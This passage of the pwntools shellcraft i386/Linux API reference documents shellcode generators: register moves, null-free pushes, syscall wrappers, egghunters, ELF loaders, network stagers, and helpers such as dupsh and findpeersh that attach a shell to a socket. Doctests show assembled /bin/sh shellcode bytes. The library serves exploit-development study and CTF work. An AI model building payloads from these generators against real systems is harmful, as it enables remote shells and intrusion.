If the src is a register larger than the dest, then only some of the bits will be used.
If src is a string that is not a register, then it will locally set context.arch to ‘i386’ and use
pwnlib.constants.eval()
to evaluate the string. Note that this means that this shellcode can change behavior depending on the value of context.os.Parameters: Example
>>> print shellcraft.i386.mov('eax','ebx').rstrip() mov eax, ebx >>> print shellcraft.i386.mov('eax', 0).rstrip() xor eax, eax >>> print shellcraft.i386.mov('ax', 0).rstrip() xor ax, ax >>> print shellcraft.i386.mov('ax', 17).rstrip() xor ax, ax mov al, 0x11 >>> print shellcraft.i386.mov('edi', ord('\n')).rstrip() push 9 /* mov edi, '\n' */ pop edi inc edi >>> print shellcraft.i386.mov('al', 'ax').rstrip() /* moving ax into al, but this is a no-op */ >>> print shellcraft.i386.mov('al','ax').rstrip() /* moving ax into al, but this is a no-op */ >>> print shellcraft.i386.mov('esp', 'esp').rstrip() /* moving esp into esp, but this is a no-op */ >>> print shellcraft.i386.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.i386.mov('eax', 1).rstrip() push 1 pop eax >>> print shellcraft.i386.mov('eax', 1, stack_allowed=False).rstrip() xor eax, eax mov al, 1 >>> print shellcraft.i386.mov('eax', 0xdead00ff).rstrip() mov eax, -0xdead00ff neg eax >>> print shellcraft.i386.mov('eax', 0xc0).rstrip() xor eax, eax mov al, 0xc0 >>> print shellcraft.i386.mov('edi', 0xc0).rstrip() mov edi, -0xc0 neg edi >>> print shellcraft.i386.mov('eax', 0xc000).rstrip() xor eax, eax mov ah, 0xc000 >> 8 >>> print shellcraft.i386.mov('eax', 0xffc000).rstrip() mov eax, 0x1010101 xor eax, 0x1010101 ^ 0xffc000 >>> print shellcraft.i386.mov('edi', 0xc000).rstrip() mov edi, (-1) ^ 0xc000 not edi >>> print shellcraft.i386.mov('edi', 0xf500).rstrip() mov edi, 0x1010101 xor edi, 0x1010101 ^ 0xf500 >>> print shellcraft.i386.mov('eax', 0xc0c0).rstrip() xor eax, eax mov ax, 0xc0c0 >>> print shellcraft.i386.mov('eax', 'SYS_execve').rstrip() push (SYS_execve) /* 0xb */ pop eax >>> with context.local(os='freebsd'): ... print shellcraft.i386.mov('eax', 'SYS_execve').rstrip() push (SYS_execve) /* 0x3b */ pop eax >>> print shellcraft.i386.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop eax
-
pwnlib.shellcraft.i386.
push
(value)[source]¶ Pushes a value onto the stack without using null bytes or newline characters.
If src is a string, then we try to evaluate with context.arch = ‘i386’ using
pwnlib.constants.eval()
before determining how to push it. Note that this means that this shellcode can change behavior depending on the value of context.os.Parameters: value (int,str) – The value or register to push Example
>>> print pwnlib.shellcraft.i386.push(0).rstrip() /* push 0 */ push 1 dec byte ptr [esp] >>> print pwnlib.shellcraft.i386.push(1).rstrip() /* push 1 */ push 1 >>> print pwnlib.shellcraft.i386.push(256).rstrip() /* push 0x100 */ push 0x1010201 xor dword ptr [esp], 0x1010301 >>> print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() /* push (SYS_execve) (0xb) */ push 0xb >>> print pwnlib.shellcraft.i386.push('SYS_sendfile').rstrip() /* push (SYS_sendfile) (0xbb) */ push 0x1010101 xor dword ptr [esp], 0x10101ba >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.i386.push('SYS_execve').rstrip() /* push (SYS_execve) (0x3b) */ push 0x3b
-
pwnlib.shellcraft.i386.
pushstr
(string, append_null=True)[source]¶ Pushes a string onto the stack without using null bytes or newline characters.
Example
>>> print shellcraft.i386.pushstr('').rstrip() /* push '\x00' */ push 1 dec byte ptr [esp] >>> print shellcraft.i386.pushstr('a').rstrip() /* push 'a\x00' */ push 0x61 >>> print shellcraft.i386.pushstr('aa').rstrip() /* push 'aa\x00' */ push 0x1010101 xor dword ptr [esp], 0x1016060 >>> print shellcraft.i386.pushstr('aaa').rstrip() /* push 'aaa\x00' */ push 0x1010101 xor dword ptr [esp], 0x1606060 >>> print shellcraft.i386.pushstr('aaaa').rstrip() /* push 'aaaa\x00' */ push 1 dec byte ptr [esp] push 0x61616161 >>> print shellcraft.i386.pushstr('aaaaa').rstrip() /* push 'aaaaa\x00' */ push 0x61 push 0x61616161 >>> print shellcraft.i386.pushstr('aaaa', append_null = False).rstrip() /* push 'aaaa' */ push 0x61616161 >>> print shellcraft.i386.pushstr('\xc3').rstrip() /* push '\xc3\x00' */ push 0x1010101 xor dword ptr [esp], 0x10101c2 >>> print shellcraft.i386.pushstr('\xc3', append_null = False).rstrip() /* push '\xc3' */ push -0x3d >>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.pushstr("/bin/sh"))) 68010101018134242e726901682f62696e >>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.pushstr(""))) 6a01fe0c24 >>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.pushstr("\x00", False))) 6a01fe0c24
Parameters:
-
pwnlib.shellcraft.i386.
pushstr_array
(reg, array)[source]¶ Pushes an array/envp-style array of pointers onto the stack.
Parameters: - reg (str) – Destination register to hold the pointer.
- array (str,list) – Single argument or list of arguments to push. NULL termination is normalized so that each argument ends with exactly one NULL byte.
-
pwnlib.shellcraft.i386.
ret
(return_value=None)[source]¶ A single-byte RET instruction.
Parameters: return_value – Value to return
-
pwnlib.shellcraft.i386.
setregs
(reg_context, stack_allowed=True)[source]¶ Sets multiple registers, taking any register dependencies into account (i.e., given eax=1,ebx=eax, set ebx first).
Parameters: Example
>>> print shellcraft.setregs({'eax':1, 'ebx':'eax'}).rstrip() mov ebx, eax push 1 pop eax >>> print shellcraft.setregs({'eax':'ebx', 'ebx':'eax', 'ecx':'ebx'}).rstrip() mov ecx, ebx xchg eax, ebx
-
pwnlib.shellcraft.i386.
stackarg
(index, register)[source]¶ Loads a stack-based argument into a register.
Assumes that the ‘prolog’ code was used to save EBP.
Parameters:
-
pwnlib.shellcraft.i386.
stackhunter
(cookie = 0x7afceb58)[source]¶ Returns an an egghunter, which searches from esp and upwards for a cookie. However to save bytes, it only looks at a single 4-byte alignment. Use the function stackhunter_helper to generate a suitable cookie prefix for you.
The default cookie has been chosen, because it makes it possible to shave a single byte, but other cookies can be used too.
Example
>>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.stackhunter())) 3d58ebfc7a75faffe4 >>> with context.local(): ... context.arch = 'i386' ... print enhex(asm(shellcraft.stackhunter(0xdeadbeef))) 583defbeadde75f8ffe4
-
pwnlib.shellcraft.i386.
strcpy
(dst, src)[source]¶ Copies a string
Example
>>> sc = 'jmp get_str\n' >>> sc += 'pop_str: pop eax\n' >>> sc += shellcraft.i386.strcpy('esp', 'eax') >>> sc += shellcraft.i386.linux.write(1, 'esp', 32) >>> sc += shellcraft.i386.linux.exit(0) >>> sc += 'get_str: call pop_str\n' >>> sc += '.asciz "Hello, world\\n"' >>> run_assembly(sc).recvline() 'Hello, world\n'
-
pwnlib.shellcraft.i386.
strlen
(string, reg='ecx')[source]¶ Calculate the length of the specified string.
Parameters: Example
>>> sc = 'jmp get_str\n' >>> sc += 'pop_str: pop eax\n' >>> sc += shellcraft.i386.strlen('eax') >>> sc += 'push ecx;' >>> sc += shellcraft.i386.linux.write(1, 'esp', 4) >>> sc += shellcraft.i386.linux.exit(0) >>> sc += 'get_str: call pop_str\n' >>> sc += '.asciz "Hello, world\\n"' >>> run_assembly(sc).unpack() == len('Hello, world\n') True
-
pwnlib.shellcraft.i386.
xor
(key, address, count)[source]¶ XORs data a constant value.
Parameters: - key (int,str) – XOR key either as a 4-byte integer, If a string, length must be a power of two, and not longer than 4 bytes. Alternately, may be a register.
- address (int) – Address of the data (e.g. 0xdead0000, ‘esp’)
- count (int) – Number of bytes to XOR, or a register containing the number of bytes to XOR.
Example
>>> sc = shellcraft.read(0, 'esp', 32) >>> sc += shellcraft.xor(0xdeadbeef, 'esp', 32) >>> sc += shellcraft.write(1, 'esp', 32) >>> io = run_assembly(sc) >>> io.send(cyclic(32)) >>> result = io.recvn(32) >>> expected = xor(cyclic(32), p32(0xdeadbeef)) >>> result == expected True
pwnlib.shellcraft.i386.linux
¶
Shellcraft module containing Intel i386 shellcodes for Linux.
-
pwnlib.shellcraft.i386.linux.
accept
(fd, addr, addr_len)[source]¶ Invokes the syscall accept. See ‘man 2 accept’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- addr_len (socklen_t) – addr_len
-
pwnlib.shellcraft.i386.linux.
acceptloop_ipv4
(port)[source]¶ Parameters: port (int) – the listening port Waits for a connection. Leaves socket in EBP. ipv4 only
-
pwnlib.shellcraft.i386.linux.
access
(name, type)[source]¶ Invokes the syscall access. See ‘man 2 access’ for more information.
Parameters: - name (char) – name
- type (int) – type
-
pwnlib.shellcraft.i386.linux.
acct
(name)[source]¶ Invokes the syscall acct. See ‘man 2 acct’ for more information.
Parameters: name (char) – name
-
pwnlib.shellcraft.i386.linux.
alarm
(seconds)[source]¶ Invokes the syscall alarm. See ‘man 2 alarm’ for more information.
Parameters: seconds (unsigned) – seconds
-
pwnlib.shellcraft.i386.linux.
bind
(fd, addr, length)[source]¶ Invokes the syscall bind. See ‘man 2 bind’ for more information.
Parameters: - fd (int) – fd
- addr (CONST_SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.i386.linux.
brk
(addr)[source]¶ Invokes the syscall brk. See ‘man 2 brk’ for more information.
Parameters: addr (void) – addr
-
pwnlib.shellcraft.i386.linux.
cat
(filename, fd=1)[source]¶ Opens a file and writes its contents to the specified file descriptor.
Example
>>> f = tempfile.mktemp() >>> write(f, 'FLAG') >>> run_assembly(shellcraft.i386.linux.cat(f)).recvall() 'FLAG'
-
pwnlib.shellcraft.i386.linux.
chdir
(path)[source]¶ Invokes the syscall chdir. See ‘man 2 chdir’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.i386.linux.
chmod
(file, mode)[source]¶ Invokes the syscall chmod. See ‘man 2 chmod’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.i386.linux.
chown
(file, owner, group)[source]¶ Invokes the syscall chown. See ‘man 2 chown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.i386.linux.
chroot
(path)[source]¶ Invokes the syscall chroot. See ‘man 2 chroot’ for more information.
Parameters: path (char) – path
-
pwnlib.shellcraft.i386.linux.
clock_getres
(clock_id, res)[source]¶ Invokes the syscall clock_getres. See ‘man 2 clock_getres’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- res (timespec) – res
-
pwnlib.shellcraft.i386.linux.
clock_gettime
(clock_id, tp)[source]¶ Invokes the syscall clock_gettime. See ‘man 2 clock_gettime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.i386.linux.
clock_nanosleep
(clock_id, flags, req, rem)[source]¶ Invokes the syscall clock_nanosleep. See ‘man 2 clock_nanosleep’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- flags (int) – flags
- req (timespec) – req
- rem (timespec) – rem
-
pwnlib.shellcraft.i386.linux.
clock_settime
(clock_id, tp)[source]¶ Invokes the syscall clock_settime. See ‘man 2 clock_settime’ for more information.
Parameters: - clock_id (clockid_t) – clock_id
- tp (timespec) – tp
-
pwnlib.shellcraft.i386.linux.
clone
(fn, child_stack, flags, arg, vararg)[source]¶ Invokes the syscall clone. See ‘man 2 clone’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
close
(fd)[source]¶ Invokes the syscall close. See ‘man 2 close’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.i386.linux.
connect
(host, port, network='ipv4')[source]¶ Connects to the host on the specified port. Leaves the connected socket in edx
Parameters: Examples
>>> l = listen(timeout=5) >>> assembly = shellcraft.i386.linux.connect('localhost', l.lport) >>> assembly += shellcraft.i386.pushstr('Hello') >>> assembly += shellcraft.i386.linux.write('edx', 'esp', 5) >>> p = run_assembly(assembly) >>> l.wait_for_connection().recv() 'Hello'
>>> l = listen(fam='ipv6', timeout=5) >>> assembly = shellcraft.i386.linux.connect('ip6-localhost', l.lport, 'ipv6') >>> p = run_assembly(assembly) >>> assert l.wait_for_connection()
-
pwnlib.shellcraft.i386.linux.
connectstager
(host, port, network='ipv4')[source]¶ connect recvsize stager :param host, where to connect to: :param port, which port to connect to: :param network, ipv4 or ipv6? (default: ipv4)
-
pwnlib.shellcraft.i386.linux.
creat
(file, mode)[source]¶ Invokes the syscall creat. See ‘man 2 creat’ for more information.
Parameters: - file (char) – file
- mode (mode_t) – mode
-
pwnlib.shellcraft.i386.linux.
dir
(in_fd='ebp', size=2048, allocate_stack=True)[source]¶ Reads to the stack from a directory.
Parameters: You can optioanlly shave a few bytes not allocating the stack space.
The size read is left in eax.
-
pwnlib.shellcraft.i386.linux.
dup
(fd, fd2)[source]¶ Invokes the syscall dup. See ‘man 2 dup’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.i386.linux.
dup2
(fd, fd2)[source]¶ Invokes the syscall dup2. See ‘man 2 dup2’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
dup3
(fd, fd2, flags)[source]¶ Invokes the syscall dup3. See ‘man 2 dup3’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
dupio
(sock='ebp')[source]¶ Args: [sock (imm/reg) = ebp] Duplicates sock to stdin, stdout and stderr
-
pwnlib.shellcraft.i386.linux.
dupsh
(sock='ebp')[source]¶ Args: [sock (imm/reg) = ebp] Duplicates sock to stdin, stdout and stderr and spawns a shell.
-
pwnlib.shellcraft.i386.linux.
echo
(string, sock='1')[source]¶ Writes a string to a file descriptor
Example
>>> run_assembly(shellcraft.echo('hello', 1)).recvall() 'hello'
-
pwnlib.shellcraft.i386.linux.
egghunter
(egg, start_address = 0)[source]¶ Searches memory for the byte sequence ‘egg’.
Return value is the address immediately following the match, stored in RDI.
Parameters: - egg (str, int) – String of bytes, or word-size integer to search for
- start_address (int) – Where to start the search
-
pwnlib.shellcraft.i386.linux.
epoll_create
(size)[source]¶ Invokes the syscall epoll_create. See ‘man 2 epoll_create’ for more information.
Parameters: size (int) – size
-
pwnlib.shellcraft.i386.linux.
epoll_create1
(flags)[source]¶ Invokes the syscall epoll_create1. See ‘man 2 epoll_create1’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.i386.linux.
epoll_ctl
(epfd, op, fd, event)[source]¶ Invokes the syscall epoll_ctl. See ‘man 2 epoll_ctl’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
epoll_pwait
(epfd, events, maxevents, timeout, ss)[source]¶ Invokes the syscall epoll_pwait. See ‘man 2 epoll_pwait’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
epoll_wait
(epfd, events, maxevents, timeout)[source]¶ Invokes the syscall epoll_wait. See ‘man 2 epoll_wait’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
execve
(path='/bin///sh', argv=0, envp=0)[source]¶ Execute a different process.
Attempts to perform some automatic detection of types. Otherwise, the arguments behave as normal.
- If
path
is a string that is not a known register, it is pushed onto the stack. - If
argv
is an array of strings, it is pushed onto the stack, and NULL-terminated. - If
envp
is an dictionary of {string:string}, it is pushed onto the stack, and NULL-terminated.
Example
>>> path = '/bin/sh' >>> argv = ['sh', '-c', 'echo Hello, $NAME; exit $STATUS'] >>> envp = {'NAME': 'zerocool', 'STATUS': 3} >>> sc = shellcraft.i386.linux.execve(path, argv, envp) >>> io = run_assembly(sc) >>> io.recvall() 'Hello, zerocool\n' >>> io.poll(True) 3
- If
-
pwnlib.shellcraft.i386.linux.
exit
(status=None)[source]¶ Invokes the syscall exit. See ‘man 2 exit’ for more information.
Parameters: status (int) – status Doctest
>>> run_assembly_exitcode(shellcraft.exit(33)) 33
-
pwnlib.shellcraft.i386.linux.
faccessat
(fd, file, type, flag)[source]¶ Invokes the syscall faccessat. See ‘man 2 faccessat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fallocate
(fd, mode, offset, length)[source]¶ Invokes the syscall fallocate. See ‘man 2 fallocate’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fchdir
(fd)[source]¶ Invokes the syscall fchdir. See ‘man 2 fchdir’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.i386.linux.
fchmod
(fd, mode)[source]¶ Invokes the syscall fchmod. See ‘man 2 fchmod’ for more information.
Parameters: - fd (int) – fd
- mode (mode_t) – mode
-
pwnlib.shellcraft.i386.linux.
fchmodat
(fd, file, mode, flag)[source]¶ Invokes the syscall fchmodat. See ‘man 2 fchmodat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fchown
(fd, owner, group)[source]¶ Invokes the syscall fchown. See ‘man 2 fchown’ for more information.
Parameters: - fd (int) – fd
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.i386.linux.
fchownat
(fd, file, owner, group, flag)[source]¶ Invokes the syscall fchownat. See ‘man 2 fchownat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fcntl
(fd, cmd, vararg)[source]¶ Invokes the syscall fcntl. See ‘man 2 fcntl’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fdatasync
(fildes)[source]¶ Invokes the syscall fdatasync. See ‘man 2 fdatasync’ for more information.
Parameters: fildes (int) – fildes
-
pwnlib.shellcraft.i386.linux.
findpeer
(port=None)[source]¶ Args: port (defaults to any port) Finds a socket, which is connected to the specified port. Leaves socket in ESI.
-
pwnlib.shellcraft.i386.linux.
findpeersh
(port=None)[source]¶ Args: port (defaults to any) Finds an open socket which connects to a specified port, and then opens a dup2 shell on it.
-
pwnlib.shellcraft.i386.linux.
findpeerstager
(port=None)[source]¶ Findpeer recvsize stager :param port, the port given to findpeer: :type port, the port given to findpeer: defaults to any
-
pwnlib.shellcraft.i386.linux.
flock
(fd, operation)[source]¶ Invokes the syscall flock. See ‘man 2 flock’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fork
()[source]¶ Invokes the syscall fork. See ‘man 2 fork’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
forkexit
()[source]¶ Attempts to fork. If the fork is successful, the parent exits.
-
pwnlib.shellcraft.i386.linux.
fstat
(fd, buf)[source]¶ Invokes the syscall fstat. See ‘man 2 fstat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fstat64
(fd, buf)[source]¶ Invokes the syscall fstat64. See ‘man 2 fstat64’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fstatat64
(fd, file, buf, flag)[source]¶ Invokes the syscall fstatat64. See ‘man 2 fstatat64’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
fsync
(fd)[source]¶ Invokes the syscall fsync. See ‘man 2 fsync’ for more information.
Parameters: fd (int) – fd
-
pwnlib.shellcraft.i386.linux.
ftruncate
(fd, length)[source]¶ Invokes the syscall ftruncate. See ‘man 2 ftruncate’ for more information.
Parameters: - fd (int) – fd
- length (off_t) – length
-
pwnlib.shellcraft.i386.linux.
ftruncate64
(fd, length)[source]¶ Invokes the syscall ftruncate64. See ‘man 2 ftruncate64’ for more information.
Parameters: - fd (int) – fd
- length (off64_t) – length
-
pwnlib.shellcraft.i386.linux.
futimesat
(fd, file, tvp)[source]¶ Invokes the syscall futimesat. See ‘man 2 futimesat’ for more information.
Parameters: - fd (int) – fd
- file (char) – file
- tvp (timeval) – tvp
-
pwnlib.shellcraft.i386.linux.
getcwd
(buf, size)[source]¶ Invokes the syscall getcwd. See ‘man 2 getcwd’ for more information.
Parameters: - buf (char) – buf
- size (size_t) – size
-
pwnlib.shellcraft.i386.linux.
getdents
(fd, dirp, count)[source]¶ Invokes the syscall getdents. See ‘man 2 getdents’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
getegid
()[source]¶ Invokes the syscall getegid. See ‘man 2 getegid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
geteuid
()[source]¶ Invokes the syscall geteuid. See ‘man 2 geteuid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
getgid
()[source]¶ Invokes the syscall getgid. See ‘man 2 getgid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
getgroups
(size, list)[source]¶ Invokes the syscall getgroups. See ‘man 2 getgroups’ for more information.
Parameters: - size (int) – size
- list (gid_t) – list
-
pwnlib.shellcraft.i386.linux.
getitimer
(which, value)[source]¶ Invokes the syscall getitimer. See ‘man 2 getitimer’ for more information.
Parameters: - which (itimer_which_t) – which
- value (itimerval) – value
-
pwnlib.shellcraft.i386.linux.
getpeername
(fd, addr, length)[source]¶ Invokes the syscall getpeername. See ‘man 2 getpeername’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.i386.linux.
getpgid
(pid)[source]¶ Invokes the syscall getpgid. See ‘man 2 getpgid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.i386.linux.
getpgrp
()[source]¶ Invokes the syscall getpgrp. See ‘man 2 getpgrp’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
getpid
()[source]¶ Invokes the syscall getpid. See ‘man 2 getpid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
getpmsg
(fildes, ctlptr, dataptr, bandp, flagsp)[source]¶ Invokes the syscall getpmsg. See ‘man 2 getpmsg’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
getppid
()[source]¶ Invokes the syscall getppid. See ‘man 2 getppid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
getpriority
(which, who)[source]¶ Invokes the syscall getpriority. See ‘man 2 getpriority’ for more information.
Parameters: - which (priority_which_t) – which
- who (id_t) – who
-
pwnlib.shellcraft.i386.linux.
getresgid
(rgid, egid, sgid)[source]¶ Invokes the syscall getresgid. See ‘man 2 getresgid’ for more information.
Parameters: - rgid (gid_t) – rgid
- egid (gid_t) – egid
- sgid (gid_t) – sgid
-
pwnlib.shellcraft.i386.linux.
getresuid
(ruid, euid, suid)[source]¶ Invokes the syscall getresuid. See ‘man 2 getresuid’ for more information.
Parameters: - ruid (uid_t) – ruid
- euid (uid_t) – euid
- suid (uid_t) – suid
-
pwnlib.shellcraft.i386.linux.
getrlimit
(resource, rlimits)[source]¶ Invokes the syscall getrlimit. See ‘man 2 getrlimit’ for more information.
Parameters: - resource (rlimit_resource_t) – resource
- rlimits (rlimit) – rlimits
-
pwnlib.shellcraft.i386.linux.
getrusage
(who, usage)[source]¶ Invokes the syscall getrusage. See ‘man 2 getrusage’ for more information.
Parameters: - who (rusage_who_t) – who
- usage (rusage) – usage
-
pwnlib.shellcraft.i386.linux.
getsid
(pid)[source]¶ Invokes the syscall getsid. See ‘man 2 getsid’ for more information.
Parameters: pid (pid_t) – pid
-
pwnlib.shellcraft.i386.linux.
getsockname
(fd, addr, length)[source]¶ Invokes the syscall getsockname. See ‘man 2 getsockname’ for more information.
Parameters: - fd (int) – fd
- addr (SOCKADDR_ARG) – addr
- len (socklen_t) – len
-
pwnlib.shellcraft.i386.linux.
getsockopt
(fd, level, optname, optval, optlen)[source]¶ Invokes the syscall getsockopt. See ‘man 2 getsockopt’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
gettimeofday
(tv, tz)[source]¶ Invokes the syscall gettimeofday. See ‘man 2 gettimeofday’ for more information.
Parameters: - tv (timeval) – tv
- tz (timezone_ptr_t) – tz
-
pwnlib.shellcraft.i386.linux.
getuid
()[source]¶ Invokes the syscall getuid. See ‘man 2 getuid’ for more information.
Arguments:
-
pwnlib.shellcraft.i386.linux.
gtty
(fd, params)[source]¶ Invokes the syscall gtty. See ‘man 2 gtty’ for more information.
Parameters: - fd (int) – fd
- params (sgttyb) – params
-
pwnlib.shellcraft.i386.linux.
i386_to_amd64
()[source]¶ Returns code to switch from i386 to amd64 mode.
-
pwnlib.shellcraft.i386.linux.
ioctl
(fd, request, vararg)[source]¶ Invokes the syscall ioctl. See ‘man 2 ioctl’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
ioperm
(from_, num, turn_on)[source]¶ Invokes the syscall ioperm. See ‘man 2 ioperm’ for more information.
Parameters: - from (unsigned) – from
- num (unsigned) – num
- turn_on (int) – turn_on
-
pwnlib.shellcraft.i386.linux.
iopl
(level)[source]¶ Invokes the syscall iopl. See ‘man 2 iopl’ for more information.
Parameters: level (int) – level
-
pwnlib.shellcraft.i386.linux.
kill
(pid, sig)[source]¶ Invokes the syscall kill. See ‘man 2 kill’ for more information.
Parameters: - pid (pid_t) – pid
- sig (int) – sig
-
pwnlib.shellcraft.i386.linux.
killparent
()[source]¶ Kills its parent process until whatever the parent is (probably init) cannot be killed any longer.
-
pwnlib.shellcraft.i386.linux.
lchown
(file, owner, group)[source]¶ Invokes the syscall lchown. See ‘man 2 lchown’ for more information.
Parameters: - file (char) – file
- owner (uid_t) – owner
- group (gid_t) – group
-
pwnlib.shellcraft.i386.linux.
link
(from_, to)[source]¶ Invokes the syscall link. See ‘man 2 link’ for more information.
Parameters: - from (char) – from
- to (char) – to
-
pwnlib.shellcraft.i386.linux.
linkat
(fromfd, from_, tofd, to, flags)[source]¶ Invokes the syscall linkat. See ‘man 2 linkat’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
listen
(fd, n)[source]¶ Invokes the syscall listen. See ‘man 2 listen’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
loader
(address)[source]¶ Loads a statically-linked ELF into memory and transfers control.
Parameters: address (int) – Address of the ELF as a register or integer.
-
pwnlib.shellcraft.i386.linux.
loader_append
(data=None)[source]¶ Loads a statically-linked ELF into memory and transfers control.
Similar to loader.asm but loads an appended ELF.
Parameters: data (str) – If a valid filename, the data is loaded from the named file. Otherwise, this is treated as raw ELF data to append. If None
, it is ignored.Example
>>> gcc = process(['gcc','-m32','-xc','-static','-Wl,-Ttext-segment=0x20000000','-']) >>> gcc.write(''' ... int main() { ... printf("Hello, %s!\\n", "i386"); ... } ... ''') >>> gcc.shutdown('send') >>> gcc.poll(True) 0 >>> sc = shellcraft.loader_append('a.out')
The following doctest is commented out because it doesn’t work on Travis for reasons I cannot diagnose. However, it should work just fine :-)
# >>> run_assembly(sc).recvline() == ‘Hello, i386!n’ # True
-
pwnlib.shellcraft.i386.linux.
lseek
(fd, offset, whence)[source]¶ Invokes the syscall lseek. See ‘man 2 lseek’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
lstat
(file, buf)[source]¶ Invokes the syscall lstat. See ‘man 2 lstat’ for more information.
Parameters: - file (char) – file
- buf (stat) – buf
-
pwnlib.shellcraft.i386.linux.
lstat64
(file, buf)[source]¶ Invokes the syscall lstat64. See ‘man 2 lstat64’ for more information.
Parameters: - file (char) – file
- buf (stat64) – buf
-
pwnlib.shellcraft.i386.linux.
madvise
(addr, length, advice)[source]¶ Invokes the syscall madvise. See ‘man 2 madvise’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- advice (int) – advice
-
pwnlib.shellcraft.i386.linux.
mincore
(start, length, vec)[source]¶ Invokes the syscall mincore. See ‘man 2 mincore’ for more information.
Parameters: - start (void) – start
- len (size_t) – len
- vec (unsigned) – vec
-
pwnlib.shellcraft.i386.linux.
mkdir
(path, mode)[source]¶ Invokes the syscall mkdir. See ‘man 2 mkdir’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.i386.linux.
mkdirat
(fd, path, mode)[source]¶ Invokes the syscall mkdirat. See ‘man 2 mkdirat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
-
pwnlib.shellcraft.i386.linux.
mknod
(path, mode, dev)[source]¶ Invokes the syscall mknod. See ‘man 2 mknod’ for more information.
Parameters: - path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.i386.linux.
mknodat
(fd, path, mode, dev)[source]¶ Invokes the syscall mknodat. See ‘man 2 mknodat’ for more information.
Parameters: - fd (int) – fd
- path (char) – path
- mode (mode_t) – mode
- dev (dev_t) – dev
-
pwnlib.shellcraft.i386.linux.
mlock
(addr, length)[source]¶ Invokes the syscall mlock. See ‘man 2 mlock’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
-
pwnlib.shellcraft.i386.linux.
mlockall
(flags)[source]¶ Invokes the syscall mlockall. See ‘man 2 mlockall’ for more information.
Parameters: flags (int) – flags
-
pwnlib.shellcraft.i386.linux.
mmap
(addr=0, length=4096, prot=7, flags=34, fd=-1, offset=0)[source]¶ Invokes the syscall mmap. See ‘man 2 mmap’ for more information.
Parameters:
-
pwnlib.shellcraft.i386.linux.
mov
(dest, src, stack_allowed=True)[source]¶ Thin wrapper around
pwnlib.shellcraft.i386.mov()
, which sets context.os to ‘linux’ before calling.Example
>>> print pwnlib.shellcraft.i386.linux.mov('eax', 'SYS_execve').rstrip() push (SYS_execve) /* 0xb */ pop eax
-
pwnlib.shellcraft.i386.linux.
mprotect
(addr, length, prot)[source]¶ Invokes the syscall mprotect. See ‘man 2 mprotect’ for more information.
Parameters: - addr (void) – addr
- len (size_t) – len
- prot (int) – prot
-
pwnlib.shellcraft.i386.linux.
mprotect_all
(clear_ebx=True, fix_null=False)[source]¶ Calls mprotect(page, 4096, PROT_READ | PROT_WRITE | PROT_EXEC) for every page.
It takes around 0.3 seconds on my box, but your milage may vary.
Parameters:
-
pwnlib.shellcraft.i386.linux.
mq_notify
